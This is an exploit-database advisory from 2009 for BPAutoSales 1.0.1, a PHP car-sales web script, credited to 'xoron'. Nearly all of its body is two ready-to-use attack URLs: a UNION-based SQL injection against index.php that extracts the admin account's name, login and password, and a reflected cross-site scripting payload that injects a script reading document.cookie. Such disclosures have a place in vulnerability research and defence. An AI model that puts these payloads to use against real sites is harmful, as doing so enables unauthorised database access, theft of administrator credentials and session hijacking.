bpautosales 1.0.1 xss/SQL Multiple Vulnerabilities

2009-01-30T00:00:00
ID EDB-ID:7930
Type exploitdb
Reporter Mehmet Ince
Modified 2009-01-30T00:00:00

Description

BPAutoSales 1.0.1 (XSS/SQL) Multiple Remote Vulnerabilities. Webapps exploit for php platform

                                        
                                            =-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=
=                                 XORON 2009(C)
=
=              BPAutoSales v1.0.1 Remote SQL Injection Vuln.       
=              
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=
= Script:   BPAutoSales, version 1.0.1
= Price:      $229
=
= Author: xoron
=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-
=
= BUGS    
=
=  Sql Injections:
=      index.php?cmd=advertise_details&category=car&aid=-1/**/union/**/select/**/0,1,2,3,4,5,6,7,8,9,10,11,12,13,14,15,16,17,18,19,20,name,22,password,login/**/from/**/admin/**/where/**/id=1/*
=                       
=  XSS:
=      index.php?cmd=car_search&type=%22%3E%3Cscript%3Ealert(document.cookie)%3C/script%3E
=
=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=-=- 

# milw0rm.com [2009-01-30]